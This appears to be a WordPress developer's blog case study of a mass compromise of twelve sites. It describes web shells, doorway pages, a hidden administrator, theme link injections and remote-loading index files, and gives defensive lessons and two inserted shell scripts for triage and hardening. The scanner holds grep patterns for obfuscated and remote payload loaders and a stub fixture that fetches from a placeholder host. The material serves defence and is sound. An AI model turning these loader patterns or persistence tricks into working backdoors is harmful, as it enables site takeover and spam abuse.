WordPress Security: One Case Study Worth a Thousand Tips

Vitalii Kaplia · Articles · 19 February · 9 min

«12 sites — one password. Zero effort from the hacker — zero chances for the owner»

A story that could happen to anyone

Recently, I cleaned up a massive infection of twelve WordPress sites living on a single hosting account. Someone had added pages that never existed. Mysterious files with strange names appeared everywhere. Google started showing content about online casinos and cryptocurrency schemes under these domains in search results. The sites themselves were barely breathing, working intermittently, and the host was on the verge of blocking them completely.

The work was intense; the result was clean sites and a pile of conclusions worth sharing.

Anatomy of the breach: what we found on the server

When I got access to the server, the picture was… telling. All twelve sites lived on a single virtual hosting account (shared hosting), under one system account. One password — and the attacker had access to everything. Like a single key to a twelve-apartment building.

What was next? Grab some tea, get comfortable — because the list of what we found there is shocking.

Doorway pages — 182 pieces

Throughout WordPress — in wp-admin, wp-includes, wp-content — folders appeared with numeric names, containing index.php files. These are so-called doorway pages — ghost pages that exist only for search engine crawlers. Google indexes them, sees a «trustworthy» domain, and starts showing spam in search results. The site owner might not know for months that their domain is working for someone else’s casino. Good luck with that!

Web shells — 9+ copies

A web shell is essentially a backdoor to your server. A small PHP script through which a hacker can remotely execute any command: read files, upload new ones, delete, modify — anything they want. And we found nine such «back doors».

Files with names like clasa99.php, astar.php, proccess_config.php — scattered across various directories. Some were disguised as CSS files (editorm.css.php in /wp-includes/blocks/avatar/). One had AES encryption — this is no longer amateur work, but a tool from the arsenal for selling access on hacker forums.

Fake plugins

Directories appeared in the plugins folder that imitated legitimate extensions. Inside — PHP files of 50–60 KB, filled with obfuscated code — intentionally convoluted so that neither a person nor an antivirus could quickly understand what it does. WordPress sees them as «plugins», and the admin might not even notice an extra line in the list. Like an extra tenant in an apartment that no one invited, but quietly lives there and eats from your fridge.

Injections in themes

In six themes, the functions.php file was modified. Code with Indonesian comments (like «Memanggil file backlink») was added that loaded the backlink.php file through the wp_footer hook — an injection of external links in the site footer. Each page visit generated invisible SEO links to the attacker’s client sites.

Hidden administrator

In mu-plugins lay a file called jetpack-performance.php — a name that raises no suspicions. But inside — a filter that hid a specific user from the admin panel. The hacker created an administrator account for themselves, then made it invisible. Even if you go to «Users» — you won’t see it. It simply doesn’t exist in your interface. But it does. Sitting quietly in your apartment, eating your borscht, sleeping in your bed — and you don’t even suspect it’s there. Audacity? No. This is a business model.

Infected root files

In each index.php in the root directory, code was embedded that loaded a payload from an external server. This allowed the hacker to change the behavior of the sites without breaking in again — today a redirect to a casino, tomorrow a cryptominer, the day after a phishing page. A remote control for your site — just in someone else’s hands.
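As an added example (not code from the article), a small shell triage script that searches a WordPress root for the four indicator types described above: numeric-named doorway directories, PHP hidden behind a second extension, remote loaders in PHP files, and must-use plugins that hook the user query (the hidden-administrator trick). It builds a constructed sample tree that mirrors the findings; the patterns are heuristics, and every hit still needs a manual look.

```shell
#!/bin/sh
# Added triage helper, not code from the article: flags the four indicator
# types described above. Patterns are heuristics; review every hit by hand.
set -eu

scan_wp_root() {                     # usage: scan_wp_root /path/to/wordpress
  root=$1
  # 1. Doorway pages: directories named with digits only that carry an index.php
  find "$root" -type d -name '[0-9]*' | while IFS= read -r d; do
    case "${d##*/}" in *[!0-9]*) continue ;; esac
    if [ -f "$d/index.php" ]; then printf 'DOORWAY %s\n' "$d"; fi
  done
  # 2. PHP hidden behind an innocent-looking second extension (editorm.css.php)
  find "$root" -type f \( -name '*.css.php' -o -name '*.js.php' -o -name '*.png.php' \) \
    -exec printf 'DISGUISED %s\n' {} \;
  # 3. Remote loaders and packed payloads, the pattern seen in the root index.php
  find "$root" -type f -name '*.php' -exec grep -lE \
    'eval *\( *(base64_decode|gzinflate|str_rot13)|file_get_contents *\( *.https?://|curl_exec' {} + \
    2>/dev/null | sed 's/^/REMOTE_LOADER /'
  # 4. Must-use plugins hooking the user query: the hidden-administrator trick
  grep -lE 'pre_user_query|users_list_table_query_args' \
    "$root"/wp-content/mu-plugins/*.php 2>/dev/null | sed 's/^/USER_FILTER /'
}

build_sample_site() {                # constructed tree mirroring the findings
  site=$(mktemp -d)
  mkdir -p "$site/wp-admin/4821" "$site/wp-includes/blocks/avatar" \
    "$site/wp-content/mu-plugins" "$site/wp-content/plugins/akismet" \
    "$site/wp-content/uploads/2024/03"
  echo '<?php echo "casino"; ?>' > "$site/wp-admin/4821/index.php"
  echo '<?php /* stands in for a disguised shell */ ?>' > "$site/wp-includes/blocks/avatar/editorm.css.php"
  echo '<?php $p = file_get_contents("http://example.invalid/p"); ?>' > "$site/index.php"
  echo "<?php add_action('pre_user_query', 'hide_one_user'); ?>" > "$site/wp-content/mu-plugins/jetpack-performance.php"
  echo '<?php /* legitimate plugin, must not be flagged */ ?>' > "$site/wp-content/plugins/akismet/akismet.php"
  : > "$site/wp-content/uploads/2024/03/photo.jpg"   # numeric dirs without index.php stay quiet
  printf '%s\n' "$site"
}

demo_scan() {                        # scan the constructed site, then remove it
  site=$(build_sample_site)
  scan_wp_root "$site"
  rm -rf "$site"
}

demo_scan
```

Run it against a real install as `scan_wp_root /var/www/example`; numeric upload folders without an index.php are ignored, which keeps the doorway check quiet on a healthy site.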

Hacker accounts

On most sites, hacker administrator accounts were created. And on one site, we discovered 232 spam accounts. Two hundred thirty-two. On one site. Isn’t it getting crowded in there, guys? 😄

Who is behind this and why

Judging by the comments in the code in Indonesian — the trail leads to Southeast Asia. But don’t imagine a movie hacker in a hoodie, drinking coffee at night and grinning menacingly at a monitor. This is a conveyor. Business. Very profitable business.

The breach is massive and automated. Bots scan millions of servers, try typical passwords, or use leak databases. One stolen password — and an automatic script infects all sites on the account within minutes.

And then — monetization. Layered like an onion.

Doorway pages are sold to spam customers in batches: «1000 doorways on trustworthy domains — $300». Backdoors are resold separately — access to a hacked server on a hacker forum costs $5 to $50 per piece. Backlink injections — that’s a separate service for «black SEO». And if all else fails — you can always deploy a cryptominer or use the server for DDoS attacks.

One hacked account with twelve sites — this isn’t an «incident». This is an asset that generates income for several different buyers simultaneously.

Why this happened: no geniuses, just negligence

There are no SQL injections or complex zero-day exploits here. It’s all much more mundane. And that’s precisely what makes this story so painful.

All signs point to FTP/SSH password compromise. The infection pattern was identical on all twelve sites — one automatic pass through the file system. WordPress core files were modified — such a thing is impossible through a plugin vulnerability, you need direct file access. The files were created under the hosting system user’s account.

How did the leak happen? There are several typical scenarios.

Weak or reused password. If you use the same password for FTP and for registration on some forum — sooner or later it will end up in a leak database.

FTP client as the weakest link. FileZilla and similar clients store passwords in plain text in XML files on your computer. One info-stealing trojan — and all your accounts are compromised.

Phishing. A fake hosting control panel login page — looks identical, but sends your data somewhere completely different than you think.

And then — shared hosting did its job. Twelve sites under one system account. One password = full access to everything. Like one key to the entire building — to apartments, basements, and attics.

And one more point I can’t help but mention: the server was running PHP 7.3–7.4. PHP 7.3 hasn’t been updated since December 2021, PHP 7.4 — since November 2022. That means years without a single security patch. By 2026, the standard is PHP 8.3+. Three to four years without patches — this is a gift for any bot scanning servers.

How I treated these sites

The cleanup process took several hours of intensive work. Several very intense hours. In short — here’s what had to be done:

  • Found and deleted all malicious files — web shells, fake plugins, doorway pages, backdoors in mu-plugins, infected index.php and backlink injections in themes
  • Deleted hacker accounts from the databases of all sites
  • Downgraded suspicious «system» accounts to subscriber role
  • Regenerated WordPress secret keys (salt keys) — this logs out all active sessions, including hacker ones
  • Blocked PHP execution in the uploads directory
  • Disabled file editing through the admin panel
  • Restored corrupted theme files
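The three configuration steps from the list above (blocking PHP in uploads, disabling the file editor, regenerating the salts), as an added shell helper that is not the article’s own code. It assumes an Apache host that honours .htaccess with the Apache 2.4 «Require» syntax and a stock wp-config.php containing the eight salt defines and the «stop editing» comment; the config it hardens here is constructed.

```shell
#!/bin/sh
# Added hardening helper, not code from the article. Assumes an Apache host
# that honours .htaccess (Apache 2.4 "Require" syntax) and a stock wp-config
# layout; nginx needs an equivalent location block instead.
set -eu
WP_SALT_KEYS='AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT'
new_secret() { LC_ALL=C tr -dc 'A-Za-z0-9' </dev/urandom | head -c 64; }

harden_wp_root() {                      # usage: harden_wp_root /path/to/wordpress
  root=$1; cfg=$root/wp-config.php
  # 1. Refuse to execute PHP inside uploads, the usual drop zone for shells
  mkdir -p "$root/wp-content/uploads"
  cat > "$root/wp-content/uploads/.htaccess" <<'EOF'
<FilesMatch "\.(php|phtml|phar|php[0-9])$">
    Require all denied
</FilesMatch>
EOF
  # 2. Disable the theme/plugin editor, inserted before the "stop editing" line
  if ! grep -q DISALLOW_FILE_EDIT "$cfg"; then
    awk -v q="'" '/stop editing/ { print "define(" q "DISALLOW_FILE_EDIT" q ", true);" } { print }' \
      "$cfg" > "$cfg.tmp" && mv "$cfg.tmp" "$cfg"
  fi
  # 3. Fresh secret keys and salts: every existing login cookie becomes invalid
  for key in $WP_SALT_KEYS; do
    sed "s/define( *'$key', *'[^']*' *);/define('$key', '$(new_secret)');/" \
      "$cfg" > "$cfg.tmp" && mv "$cfg.tmp" "$cfg"
  done
}

check_wp_hardening() {                  # succeeds only when all three measures hold
  root=$1; cfg=$root/wp-config.php
  grep -q 'Require all denied' "$root/wp-content/uploads/.htaccess" 2>/dev/null &&
    grep -q DISALLOW_FILE_EDIT "$cfg" &&
    ! grep -q 'put your unique phrase here' "$cfg"
}

make_sample_site() {                    # constructed stock-style wp-config.php
  site=$(mktemp -d)
  { printf '<?php\n'
    for key in $WP_SALT_KEYS; do printf "define( '%s', 'put your unique phrase here' );\n" "$key"; done
    printf "/* That's all, stop editing! Happy publishing. */\n"
    printf "require_once ABSPATH . 'wp-settings.php';\n"; } > "$site/wp-config.php"
  printf '%s\n' "$site"
}

site=$(make_sample_site); harden_wp_root "$site"
check_wp_hardening "$site" && echo "hardened: $site"; rm -rf "$site"
```

Hacker and spam accounts still have to be removed from the database separately; the salt rotation only ends their sessions.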

That was the technical part. But without changing the approach to security — all of this will have to be repeated again and again.

Five lessons that cost a sleepless night

I prepared a detailed WordPress security checklist for 2026 — available on my educational portal: WordPress Security Checklist (2026). It has everything — from wp-config.php configuration to security header settings and WAF.

But if I highlight the most important takeaways from this story — here are five conclusions.

One password — one point of failure. If ten sites live on your hosting under one account — compromising one password means compromising everything. Use SSH keys instead of passwords. If passwords — only unique, only complex, only through a password manager. And never — never — store them in FileZilla or other FTP clients.

PHP should be current. As I mentioned above — outdated PHP without security patches is an invitation for bots. Update to a current version, don’t delay.

Shared hosting is a shared apartment. Your sites live next to hundreds of others, and one compromised neighbor can become a problem for everyone. For serious projects, consider a VPS or dedicated server, or hosting that isolates sites from each other.

Monitoring is not a luxury. The owner of these sites learned about the breach by accident — when Google was already indexing spam under their domains. If Wordfence or any other file integrity monitoring had been installed — the breach would have been detected within an hour, not months.

Backups are not «I’ll do it later». If clean backups existed — recovery would have taken minutes, not hours of manual work to find and delete each malicious file individually.

Summary

A breach is never just a technical problem. It’s a problem of priorities.

When a business decides to «save» on security, postpone updates, use one password for everything — they’re not saving. They’re taking a loan. A loan with a very high interest rate that will have to be paid not in money, but in reputation, Google rankings, client data, and sleepless nights.

Twelve sites. One night. One password.

Don’t be this case.

If your WordPress site is behaving strangely, Google is showing someone else’s content under your domain, or you just want to make sure everything is fine — contact me. I’ll conduct a security audit, find vulnerabilities, and close them before someone else exploits them. It’s better to spend an hour on a check now than several sleepless nights on treatment later.

Vitalii Kaplia

Founder, Web Developer & WordPress Expert
